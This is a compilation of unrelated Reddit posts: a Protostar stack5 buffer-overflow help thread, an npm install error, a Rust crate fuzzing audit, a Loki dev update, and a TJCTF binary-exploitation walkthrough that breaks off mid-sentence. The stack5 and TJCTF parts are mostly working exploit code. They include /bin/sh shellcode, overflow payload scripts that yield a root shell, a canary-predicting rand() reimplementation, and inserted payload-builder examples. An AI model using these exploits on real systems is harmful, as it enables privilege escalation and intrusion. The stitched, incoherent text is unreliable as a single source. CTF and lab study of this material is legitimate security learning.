0xbffff7bc: 0xbffff770
Well, this is good for the next EIP address! Check to see if our shellcode is still there:
gdb$ x/30i 0xbffff770
0xbffff770: nop
0xbffff771: nop
0xbffff772: nop
0xbffff773: nop
0xbffff774: nop
0xbffff775: add esp,0x10
0xbffff778: xor eax,eax
0xbffff77a: xor ebx,ebx
0xbffff77c: mov al,0x6
0xbffff77e: int 0x80
0xbffff780: push ebx
0xbffff781: push 0x7974742f
0xbffff786: push 0x7665642f
0xbffff78b: mov ebx,esp
0xbffff78d: xor ecx,ecx
0xbffff78f: mov cx,0x2712
0xbffff793: mov al,0x5
0xbffff795: int 0x80
0xbffff797: xor eax,eax
0xbffff799: push eax
0xbffff79a: push 0x68732f2f
0xbffff79f: push 0x6e69622f
0xbffff7a4: mov ebx,esp
0xbffff7a6: push eax
0xbffff7a7: push ebx
0xbffff7a8: mov ecx,esp
0xbffff7aa: cdq
0xbffff7ab: mov al,0xb
0xbffff7ad: int 0x80
0xbffff7af: nop
In GDB, perfect, it is working!
gdb$ c
Executing new program: /bin/dash
$
Out of GDB it is NOT working anymore:
Same payload as in gdb:
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*9 + '\x38\xf8\xff\xbf' + '\x70\xf7\xff\xbf')";) | ./stack5 
or (overwriting EBP):
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*13 + '\x70\xf7\xff\xbf')";) | ./stack5 
The only thing I get: Illegal instruction! Here is an strace if it can help...
execve("./stack5", ["./stack5"], [/* 16 vars */]) = 0
brk(0) = 0x804a000
fcntl64(0, F_GETFD) = 0
fcntl64(1, F_GETFD) = 0
fcntl64(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=13796, ...}) = 0
mmap2(NULL, 13796, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fdc000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320m\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1319176, ...}) = 0
mmap2(NULL, 1329480, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e97000
mprotect(0xb7fd5000, 4096, PROT_NONE) = 0
mmap2(0xb7fd6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13e) = 0xb7fd6000
mmap2(0xb7fd9000, 10568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e96000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e966c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fd6000, 8192, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fdc000, 13796) = 0
fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
read(0, "\220\220\220\220\220\203\304\0201\3001\333\260\6\315\200Sh/ttyh/dev\211\3431\311f"..., 4096) = 80
read(0, "", 4096) = 0
--- SIGILL (Illegal instruction) @ 0 (0) ---
+++ killed by SIGILL +++
Illegal instruction
Questions / other information
I know there could be some address changes caused by ENV vars but I do not think that is the problem... but I have no evidence.

Just for the example, shellcode after EIP (outside the buffer): everything is OK
user@protostar:/opt/protostar/bin$ (python -c "import sys; sys.stdout.write('\x90'*76 + '\xc0\xf7\xff\xbf' + '\x90'*10 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')";) | ./stack5
# whoami
root

EDIT :
I'm adding the Python exploit scripts for reference:

Shellcode inside the buffer (not working)
import struct

totalpad = 76  # Total bytes needed to start overwriting EIP
NOP = "\x90" * 5
shellcode = ("\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev"
             "\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh"
             "\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")
EIP = struct.pack("I", 0xbffff770)
nbpad = totalpad - len(NOP) - len(shellcode)
PAD = 'A' * nbpad
print NOP + shellcode + PAD + EIP

Shellcode outside the buffer (working fine)
import struct

NOP1 = "\x90" * 76
EIP = struct.pack("I", 0xbffff7c0)
NOP2 = "\x90" * 10
shellcode = ("\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev"
             "\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh"
             "\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")
print NOP1 + EIP + NOP2 + shellcode

EDIT: shellcode inside the buffer is now working :-)
When executing outside gdb and attaching to the process, I see that the start of the buffer is located at another memory address.
So instead of hardcoding the start of the buffer in EIP, I use a register to jump to.
Hopefully there is one that holds the right address: eax.
Here is the working exploit with the shellcode inside the buffer:
import struct

totalpad = 76  # Total bytes needed to start overwriting EIP
# Little NOP slide
NOP = "\x90" * 2
# Shellcode maintaining / reopening stdin (for gets exploitation)
shellcode = ("\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev"
             "\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh"
             "\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")
# The buffer start address is 0xbffff770, but hardcoding the address is unreliable
# EIP = struct.pack("I", 0xbffff770)
# We will use a register to jump to the start of the buffer.
# We know from debugging the program that eax contains the address we want.
# We look with: objdump -D stack5 -M intel | grep call | grep eax
#   80483bf: ff d0    call eax
#   804846b: ff d0    call eax
# We have two addresses that will call eax and so can trigger our exploit!
# EIP will point to the address that does "call eax"
EIP = struct.pack("I", 0x80483bf)
# We leave EBP optional: either overwrite it with trash or use its original address
EBP = struct.pack("I", 0xbffff7b8)
#EBP = "BBBB"
nbpad = totalpad - len(NOP) - len(shellcode) - len(EBP)
PAD = 'A' * nbpad
# our payload
print NOP + shellcode + PAD + EBP + EIP

Usage:
$ python /home/user/python_exploits/stack5_inside_buffer.py | /opt/protostar/bin/stack5
# whoami
root
Stéphane
submitted by tequilaweb81 to LiveOverflow [link] [comments]
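The register-relative jump the post ends with, as an added example (Python 3; this is not the original poster's Python 2 script): a payload builder that packs the `call eax` gadget address instead of a stack address, checks the layout computed above (76 bytes from the gets() buffer to the saved EIP, 58-byte shellcode, 4-byte saved EBP), refuses a payload containing 0x0a because gets() would stop reading there, and a byte scanner that finds `ff d0` (`call eax`) in a code blob so the gadget address does not have to be read off objdump by hand. The shellcode, the offsets and the 0x80483bf gadget come from the post; the blob the scanner is run on in the test is constructed here, not read from the real stack5 binary, and mapping file offsets to virtual addresses for a real ELF is left to the caller via the `base` argument.

```python
"""Payload builder for the Protostar stack5 layout described in the post.

Added example, not the original poster's script.  Assumptions: the 76-byte
distance from the start of the gets() buffer to the saved EIP, the 58-byte
shellcode and the `call eax` gadget at 0x80483bf are taken from the post;
find_call_eax() is a plain byte search, and the caller supplies the virtual
address of the blob's first byte (for a non-PIE i386 binary, the .text
address from `readelf -S` when the blob is the .text bytes).
"""
import struct

# Shellcode from the post: reopens /dev/tty on fd 0, then execve("/bin//sh").
SHELLCODE = (
    b"\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev"
    b"\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh"
    b"\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
)
CALL_EAX = b"\xff\xd0"  # x86 encoding of `call eax`


def find_call_eax(blob: bytes, base: int) -> list:
    """Return the virtual address of every `call eax` found in `blob`.

    `base` is the virtual address of blob[0].  Any hit inside a non-PIE text
    segment is a fixed address and can be packed straight into the payload.
    """
    hits, off = [], blob.find(CALL_EAX)
    while off != -1:
        hits.append(base + off)
        off = blob.find(CALL_EAX, off + 1)
    return hits


def build_payload(ret_addr: int, dist_to_eip: int = 76,
                  nop_count: int = 2, ebp: int = 0xbffff7b8) -> bytes:
    """NOP sled + shellcode + padding + saved EBP + new EIP (little-endian).

    With ret_addr pointing at a `call eax` gadget the payload no longer
    depends on where the stack buffer lands, which is what differs between
    a run under gdb and a run from a pipe (the environment shifts the stack).
    """
    body = b"\x90" * nop_count + SHELLCODE
    pad_len = dist_to_eip - len(body) - 4  # 4 bytes are the saved EBP
    if pad_len < 0:
        raise ValueError("NOP sled + shellcode do not fit before the saved EBP")
    payload = (body + b"A" * pad_len
               + struct.pack("<I", ebp) + struct.pack("<I", ret_addr))
    assert len(payload) == dist_to_eip + 4
    # gets() stops at a newline, so a 0x0a anywhere would truncate the payload.
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would truncate it")
    return payload


if __name__ == "__main__":
    import sys
    # Usage: python3 stack5_payload.py | /opt/protostar/bin/stack5
    sys.stdout.buffer.write(build_payload(0x80483bf))
```

Because EIP goes through a gadget in the non-PIE text segment, the same 80 bytes work under gdb and from a pipe whatever stack address the environment gives the buffer; the newline check is the caveat that bites when a chosen gadget or EBP value happens to contain 0x0a.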

Troubles installing nativefier

I try to install nativefier by running the command npm install nativefier and get this error:
npm WARN deprecated [email protected]: [email protected]<3 is no longer maintained and not recommended for usage due to the number of issues. Please, upgrade your dependencies to the actual version of [email protected]
npm WARN deprecated [email protected]: request has been deprecated, see https://github.com/request/request/issues/3142

> [email protected] postinstall /home/vasco/node_modules/babel-polyfill/node_modules/core-js
> node -e "try{require('./postinstall')}catch(e){}"


> [email protected] postinstall /home/vasco/node_modules/babel-runtime/node_modules/core-js
> node -e "try{require('./postinstall')}catch(e){}"

/home/vasco
(dependency tree omitted: every package name and version in it was replaced by "[email protected]" during extraction, so nothing recoverable remains)

npm WARN enoent ENOENT: no such file or directory, open '/home/vasco/package.json'
npm WARN vasco No description
npm WARN vasco No repository field.
npm WARN vasco No README data
npm WARN vasco No license field.
submitted by JeanEdouardKevin to linuxquestions [link] [comments]

Auditing popular crates: how a one-line unsafe has nearly ruined everything

Edit: this is a rather long post that's not very readable on old Reddit's grey background. Click here to read it on Medium.
Following the actix-web incident (which is fixed now, at least mostly) I decided to poke other popular libraries and see what comes of it. The good news is I've poked at 6 popular crates now, and I've got not a single actually exploitable vulnerability. I am impressed. When I poked popular C libraries a few years ago it quickly ended in tears (that is, security vulnerabilities). The bad news is I've found one instance that was not a security vulnerability by sheer luck, plus a whole slew of denial-of-service bugs. And I can't fix all of them by myself. Read on to find out how I did it, and how you can help!
My workflow was roughly like this:
  1. See if the crate has been fuzzed yet to identify low-hanging fruit.
  2. If it has been fuzzed, check sanity of fuzzing harness.
  3. If something is amiss, fuzz the crate.
  4. In case fuzzing turns up no bugs, eyeball the unsafes and try to check them for memory errors.
  5. If no horrific memory errors turn up, try to replace whatever's under unsafe with safe code without sacrificing performance.
Turns out Rust community is awesome and not only has excellent integration for all three practical fuzzers along with a quick start guide for each, but also a huge collection of fuzz targets that covers a great deal of popular crates. Ack! Getting low-hanging fruit at step 1 is foiled!
So I've started checking whether fuzzing targets were written properly. Specifically, I've started looking for stuff that could block fuzzing - like checksums. A lot of formats have them internally, and PNG has not one but two - crc32 in png format and adler32 in deflate. And lo and behold, none of the crates were actually disabling checksums when fuzzing! This means that random input from fuzzer was rejected early (random data does not have a valid checksum in it, duh) and never actually reached the interesting decoding bits. So I've opened PRs for disabling checksums during fuzzing in miniz_oxide, png, lodepng-rust, and ogg, and then fuzzed them with checksums disabled. This got me:
inflate crate was the first where fuzzing has turned up nothing at all, so I've started eyeballing its unsafes and trying to rewrite them into safe code. I've added a benchmarking harness and started measuring whether reverting back to safe code hurts performance. cargo bench was too noisy, but I've quickly discovered criterion which got me the precision I needed (did I mention Rust tooling is awesome?). I got lucky - there were two unsafes with two-line safe equivalent commented out, and reverting back to safe code created no measurable performance difference. Apparently the compiler got smarter since that code was written, so I've just reverted back to safe code.
This left just one unsafe with a single line in it. Spot the security vulnerability. I would have missed it if the crate maintainer hadn't pointed it out. If you can't, there are hints at the end of this post.
By sheer luck the rest of the crate just so happens to be structured in a way that never passes input parameters that trigger the vulnerability, so it is not really exploitable. Probably. I could not find a way to exploit it, and the crate maintainer assures me it's fine. Perhaps we just haven't figured out how to do it yet. After all, almost everything is exploitable if you try hard enough.
Sadly, simply replacing the unsafe .set_len() with .resize() regressed the decompression performance by 10%, so instead I've added an extra check preventing this particular exploit from happening, and then liberally sprinkled the function with asserts that panic on every other way this unsafe could go wrong that I could think of.
Is the function secure now? Well, maybe. Maybe not. Unless we either rewrite it in safe rust (or prove its correctness, which is a lot harder) we will never know.
The thing is, I'm pretty sure it's possible to rewrite this in safe Rust without performance penalty. I've tried some local optimizations briefly, to no avail. Just like with high-level languages, writing fast safe Rust requires staying on the optimizer's happy paths, and I have not found any documentation or tooling for doing that. The best I've got is https://godbolt.org/ that lets you inspect the LLVM IR as well as assembler and shows what line of Rust turned into what line of assembly, but you can't feed your entire project to it. You can get rustc to dump LLVM IR, but it will not tell you what line turned into what (at least by default), let alone do readable highlighting. As pointed out in comments, cargo-asm does the trick! And you also need tools to understand why a certain optimization was not applied by rustc. LLVM flags -Rpass-missed and -Rpass-analysis seem to be capable of doing that, but there is literally no documentation on them in conjunction with Rust.
Discussing the vulnerability further would be spoilerrific (seriously, try to locate it yourself), so I'll leave further technical discussion until the end of the post. I want to say that I was very satisfied with how the crate maintainer reacted to the potential vulnerability - he seemed to take it seriously and investigated it promptly. Coming from C ecosystem it is refreshing to be taken seriously when you point out those things.
By contrast, nobody seems to care about denial of service vulnerabilities. In the 3 crates I've reported such vulnerabilities for, after 3 weeks not a single one was investigated or fixed by maintainers of those crates, or anyone else really. And the DoS bugs are not limited to panics that you can just isolate into another thread and forget about.
After not getting any reaction from crate maintainers for a while I tried fixing those bugs myself, starting with the png crate. In stark contrast to C, it is surprisingly easy to jump into an existing Rust codebase and start hacking on it, even if it does rather involved things like PNG parsing. I've fixed all the panics that fuzzers discovered based on nothing but debug mode backtraces, and I don't even know Rust all that well. Also, this is why there are 4 distinct panics listed for the png crate: I've fixed one and kept fuzzing until I discovered the next one. lewton probably has many more panics in it, I just didn't get beyond the first one. Sadly, three weeks later my PR is still not merged, reinforcing the theme of "nobody cares about denial of service". And png still has a much nastier DoS bug that cannot be isolated in a thread.
(To be clear, this is not meant as bashing any particular person or team; there may be perfectly valid reasons for why it is so. But this does seem to be the trend throughout the ecosystem, and I needed some examples to illustrate it).
Also, shoutout to tungstenite - it was the only crate that did not exhibit any kinds of bugs when being fuzzed for the first time. Kudos.
Conclusions:
Originally I thought this would be a fun exercise for a few weekends, but the scope of the work quickly grew way beyond what I can hope to achieve alone. This is where you come in, though! Here's a list of things you can try, in addition to the hard tooling tasks listed above:
  1. Fuzz all the things! It takes 15 minutes to set up per crate, there is no reason not to. Also, there is a trophy case.
  2. Fix bugs already discovered. For example: panic in lewton (easy), unbounded memory consumption in png (intermediate), lodepng memory leak (C-hard). You can also fuzz lewton afterwards to get more panics, just don't forget to use ogg dependency from git. You can reuse my fuzz harnesses if you wish.
  3. Refactor unsafes in popular crates into safe code, ideally without sacrificing performance. For example, inflate crate has just one unsafe block remaining, png has two. There are many more crates like that out there.
  4. There are easy tasks on docs and tooling too: AFL.rs documentation is outdated and describes only version 0.3. Version 0.4 has added in-process fuzzing that's ~10x faster, it needs to be mentioned. Also, AFL could use more Rusty integration with Cargo, closer to what cargo-fuzz does. Also, disabling checksums is a common pitfall that needs to be mentioned.
I'd love to keep fixing all the things, but at least in the coming month I will not be able to dedicate any time to the project. I hope I've managed to at least lead by example.
And now, details on that vulnerability! If you haven't found it yourself, here's a hint: similar bugs in C libraries.
If you still haven't found it, see the fix.
Spoilerrific discussion of the vulnerability below.
Vulnerable code from git history for reference
The function run_len_dist() does a fairly trivial thing: resizes a vector to fit a specified amount of data and copies data from element i to element i+dist until i+dist hits the end of the vector. For performance, contents of the vector are not initialized to zeroes when resizing, as it would have been done by vec.resize(); instead, vec.set_len() is used, creating a vector with a number of elements set to uninitialized memory at the end.
The function never checks that dist is not zero. Indeed, if you call it with dist set to 0, it will simply read uninitialized memory and write it right back, exposing memory contents in the output.
If this vulnerability were actually exploitable from the external API (which it isn't, probably), inflate would have output contents of uninitialized memory in the decompressed output. inflate crate is used in png crate to decompress PNGs. So if png crate was used in a web browser (e.g. servo) to decode images, an attacker could pass a crafted PNG to the client, then read the decoded image using javascript. This lets the attacker read memory contents from the browser - cookies, passwords, you name it. This is not quite as bad as Heartbleed or Meltdown, but it's up there.
Sadly, regular fuzzing would not have discovered this vulnerability. If it were actually exploitable, at least one way to trigger it would involve setting several distinct bytes in the input to very specific values. And even the best current generation fuzzers cannot trigger any behavior that requires changing more than one byte simultaneously, except in rare cases or if you explicitly tell them what consecutive byte strings to try. And there is nothing in the code that would guide the fuzzers to these specific values.
Even if fuzzers did discover such an input by random chance, they would not have recognized it as a vulnerability, unless you do either of these things:
This just goes to show that fuzzing unsafe code does not actually guarantee absence of bugs.
Safe Rust, however, does guarantee absence of memory errors that lead to arbitrary code execution exploits and other unspeakable horrors. So let's use it.
submitted by Shnatsel to rust [link] [comments]
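The run_len_dist() bug discussed above, as an added Rust example that is not the inflate crate's code: a memory-safe model of the vulnerable shape (Vec::resize with a marker byte stands in for the uninitialised memory that an unsafe set_len() leaves behind, so the example itself has no undefined behaviour) next to a checked version that rejects dist == 0 and any back-reference reaching before the start of the output. The function names, signatures and the STALE marker are assumptions made for illustration; the real function's call sites, which the post says never pass dist == 0, are not reproduced.

```rust
// Added example, not the inflate crate's code.  Models the run_len_dist()
// shape from the post: extend the output vector, then copy each byte from
// position i - dist to position i.  STALE stands in for whatever the heap
// held before; with set_len() the real crate would hand back exactly that.

/// Marker for "uninitialised" bytes in the model (constructed value).
const STALE: u8 = 0xEE;

/// Vulnerable shape: no check on `dist`.  With dist == 0 every new byte is
/// copied onto itself, so the STALE contents end up in the output.
/// (With dist > the existing length the index underflows and this panics,
/// which is the DoS half of the same missing validation.)
fn run_len_dist_unchecked(out: &mut Vec<u8>, len: usize, dist: usize) {
    let old = out.len();
    out.resize(old + len, STALE); // stands in for unsafe set_len(old + len)
    for i in 0..len {
        out[old + i] = out[old + i - dist];
    }
}

/// Checked version: rejects dist == 0 and back-references before the start
/// of the output, and uses push() so every byte written is initialised.
fn run_len_dist_checked(
    out: &mut Vec<u8>,
    len: usize,
    dist: usize,
) -> Result<(), &'static str> {
    if dist == 0 {
        return Err("back-reference distance must be non-zero");
    }
    if dist > out.len() {
        return Err("back-reference reaches before the start of the output");
    }
    let start = out.len() - dist;
    out.reserve(len);
    for i in 0..len {
        // Overlapping copy: when len > dist this reads bytes pushed by
        // earlier iterations of this same loop, which is the LZ77 semantics.
        let b = out[start + i];
        out.push(b);
    }
    Ok(())
}

/// Apply a sequence of (len, dist) back-references to a seed of literals,
/// the way an inflate decoder would after reading them from the stream.
fn apply_refs(seed: &[u8], refs: &[(usize, usize)]) -> Result<Vec<u8>, &'static str> {
    let mut out = seed.to_vec();
    for &(len, dist) in refs {
        run_len_dist_checked(&mut out, len, dist)?;
    }
    Ok(out)
}

fn main() {
    let mut leaky = vec![b'a', b'b', b'c'];
    run_len_dist_unchecked(&mut leaky, 4, 0);
    println!("unchecked, dist=0: {:02x?}", leaky); // trailing bytes are STALE

    println!("checked, dist=0: {:?}", apply_refs(b"abc", &[(4, 0)]));
    println!("checked, dist=2: {:?}", apply_refs(b"abc", &[(5, 2)]));
}
```

The checked version costs a bounds check per byte pushed; the post measured a 10% regression for the resize-based fix in the real crate, which is why the maintainers chose an explicit dist check plus asserts instead, and the dist == 0 and dist > len guards here are exactly those checks.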

Weekly Dev Update 08/07/2019

Hey Y’all,
We’ve been busy bug catching this week! The testnet period for 4.0.0 Hefty Heimdall is still running, and we’re still working hard to track down a number of bugs that have appeared.
Last week we released the beta version of Loki Messenger, which was well received. Through testing we discovered a number of bugs so we’ve released an updated version which can be found on Github.
Service Node operators should download and update to the 3.0.7 release which includes security patches for some DoS bugs found in Monero. Click here for instructions: https://lokidocs.com/ServiceNodes/SNFullGuide/#updating-your-binaries.

Loki Core
---------------------------
Loki Launcher
The Loki Launcher is a node JS package that will allow for the independent management of all the components required to run a full Service Node. This includes managing Lokinet, lokid, the Loki Storage Server and any other future applications we require. When Loki Service Nodes begin to route data and store messages for Lokinet and Loki Messenger, we’ll recommend that every single Service Node run the Loki Launcher.
What’s going on this week with Loki Launcher:
We released the updated Loki Launcher for the testnet and got some real world testing done. Several bugs were found and squashed. Additionally our 3.0.7 release turned more users to the launcher for the first time. We took on all the community feedback and tried to reduce confusion to improve the user experience.
Changelog:
Github Pulse: Excluding merges, 1 author has pushed 41 commits to master and 41 commits to all branches. On master, 14 files have changed and there have been 479 additions and 198 deletions.
---------------------------
Lokinet
If you’re on our Discord you might catch Jeff or Ryan, the developers of LLARP, live streaming as they code: https://www.twitch.tv/uguu25519, https://www.twitch.tv/neuroscr.
What’s going on this week with Lokinet:
We tried to remove cppbackport and refactor the configuration system, however after review we decided to revert some changes. We also attempted to fix the broken MacOS port and made some minor protocol improvements.
Changelog:
Pull Requests:
--------------------------
Loki Locker
After taking feedback from the Loki Locker beta testing period, we will soon be releasing an updated version for public usage.
--------------------------
Loki Messenger Desktop
Storage Server
Messenger Mobile (iOS and Android)
https://github.com/loki-project/loki-messenger-android/commits/master.
--------------------------
Thanks,
Kee
submitted by Keejef to LokiProject [link] [comments]

TJCTF 2018 - Binary Exploitation Guide

Hello, I am pretty new here and I just created a full guide for all pwn challenges from TJCTF.
I hope you'll enjoy them, here is the original link on medium: https://medium.com/@mihailferaru2000/tjctf-2018-full-binary-exploitation-walk-through-a72a9870564e

Math Whiz

We have a simple binary that will show us the flag if we could become admin.
if (admin) {
    printf("Successfully registered '%s' as an administrator account!\n", username);
    printf("Here is your flag: %s\n", FLAG);
} else {
    printf("Successfully registered '%s' as an user account!\n", username);
}
But the admin variable is not set anywhere, so we need to pwn it. It will be pretty easy as we have the source code provided. If we take a look at the input function, we observe that it reads the specified size multiplied by 16. The most obvious buffer overflow is when the PIN code gets read:
input(recoverypin, 4); 
This means that we read 64 bytes into a 4-byte array. We also see that the admin variable is declared before the buffers, so the question is how could we override it? Usually, modern compilers move buffers before any other variables in order to get them away from the return pointer, but in our case, we are at an advantage. Finally, any input larger than 52 bytes will provide us this beauty: tjctf{d4n63r0u5_buff3r_0v3rfl0w5}

Tilted Troop

We’ve got a binary that should read 8 team members with random strengths and simulate a battle with some fantastic creature. If the sum of strengths is our goal (400 in this case), we will get the flag. Again, we have the source code, so our life is a lot easier when we don’t have to disassemble. We see that the array of strengths is kept right after the array of names and maybe we could override somehow.
Checking how bound checks are done, we can spot a bug:
if(t.teamSize > MAX_TEAM_SIZE) 
Array indexing starts from 0, so from 0 to MAX_TEAM_SIZE there are MAX_TEAM_SIZE + 1 elements. We need to create 8 members in our team and then just override the strength variable.
from pwn import *

# io is a pwntools tube (process() or remote()) opened earlier in the script
for i in range(4):
    io.recvline()
for i in range(8):
    io.sendline('A test')
# this will override the strength buffer
# 'd' = 100 => 'd' * 4 = 400
io.sendline('A dddd')
io.sendline('F')
io.interactive()
And here it is: tjctf{0oPs_CoMP4Ri5ONs_r_h4rD}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/strover.py

Future Canary Lab

Again we have to deal with overriding a variable, but this time there is some kind of protection:

```c
// canary generation
for (i = 0; i < 10; ++i) {
    canary[i] = check[i] = rand();
}
// ...
// canary check
for (j = 0; j < 10; ++j) {
    if (canary[j] != check[j]) {
        printf("Alas, it would appear you lack the time travel powers we desire.\n");
        exit(0);
    }
}
```

If you are familiar with stack canaries (or stack cookies) you will recognize this as a handmade implementation. rand() is not a cryptographically secure generator: given the seed, its output is fully reproducible. In main() we see that it is seeded with the current time, so it is pretty vulnerable. Using the time at which we connect to the server as the seed, we can regenerate the canary values. Here is a little C program that prints 10 random values for a given seed:

```c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    if (argc < 2) {
        return 1;
    }
    int seed = atoi(argv[1]);   /* the UNIX time at which we connected */
    srand(seed);
    for (int i = 0; i <= 9; i++) {
        printf("%d\n", rand());
    }
    return 0;
}
```

Now that the canary is bypassed, we need to satisfy the following condition:

```c
if (secret - i + j == 0xdeadbeef)
```

secret is always 0, j is always 10 and i is under our control, so we need to override i with 0x2152411b (10 - 0xdeadbeef, taken modulo 2^32) to solve the equation.
At the end we have: tjctf{3l_p5y_k0n6r00_0ur_n3w357_l4b_m3mb3r!}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/interview.py
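The same reproduction in Python, added here as an example (it is not part of the write-up or of the linked solution): it re-implements glibc's rand() so the 10 canary values can be computed for the seconds around the connection time without compiling anything, and prints candidates for a small window of seeds to absorb clock skew. It assumes the target is glibc's default generator seeded with the current time, as the write-up describes; the seed window and the candidate helper are my own additions.

```python
import time

def glibc_random(seed, count):
    """Reproduce glibc's rand()/random() (the default TYPE_3 additive feedback
    generator) for a given srand() seed and return its first `count` outputs.

    Mirrors glibc's srandom_r/random_r: 31 state words are derived from the seed
    with a Park-Miller LCG (Schrage's method), 310 outputs are discarded, then
    r[i] = r[i-31] + r[i-3] (mod 2^32) and each rand() value is r[i] >> 1.
    """
    seed &= 0xFFFFFFFF
    if seed >= 0x80000000:      # the state words are int32_t
        seed -= 0x100000000
    if seed == 0:               # glibc substitutes 1 for a zero seed
        seed = 1
    r = [0] * (344 + count)
    r[0] = seed
    for i in range(1, 31):
        word = r[i - 1]
        hi = abs(word) // 127773 * (1 if word >= 0 else -1)   # C truncating division
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r[i] = word
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344 + count):
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    return [r[i] >> 1 for i in range(344, 344 + count)]

def canary_candidates(connect_time, window=2, count=10):
    """The 10 canary values for every seed in [connect_time - window, connect_time + window].
    The server seeds with its own time(NULL), which we can only estimate, so we try
    a few neighbouring seconds (assumption: the clocks are within `window` seconds)."""
    return {t: glibc_random(t, count)
            for t in range(connect_time - window, connect_time + window + 1)}

if __name__ == "__main__":
    now = int(time.time())
    for seed, values in sorted(canary_candidates(now).items()):
        print(seed, " ".join(str(v) for v in values))
```

Run it right before connecting and feed each candidate row to the exploit until the canary check passes; glibc_random(1, 4) must give the familiar 1804289383, 846930886, 1681692777, 1714636915 sequence, which is a quick way to confirm the port against a real srand(1).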
We were given a small demo banking system. We have the source code, so the vulnerability will be easy to spot. At first glance it looks secure, but in the verify_pin() function there is a clear buffer overflow. Let's run checksec to see which protections the binary has:

```
$ checksec problem
[*] '/home/littlewho/ctfs/tjctf2018/problem'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
```

No stack canary, no NX (the stack and the data segments are executable) and no PIE, so the solution is straightforward. The name array is global, so it is stored in the BSS section at a fixed, known address: 0x6010A0. We can store our shellcode there and use the overflow to jump to it.

```asm
; execve(["/bin/sh",], [], [])
bits 64
push 0x68                       ; "h\0\0\0\0\0\0\0"
mov rax, 0x732f2f6e69622f2f     ; "//bin//s"
push rax                        ; rsp now points to "//bin//sh\0"
mov rdi, rsp                    ; filename
xor rsi, rsi                    ; argv = NULL
xor rdx, rdx                    ; envp = NULL
xor r10, r10
mov rax, 0x3b                   ; SYS_execve
syscall
```

Assemble it as a raw binary with nasm (nasm -f bin) so the bytes can go straight into the payload. The layout of the attack vector is:

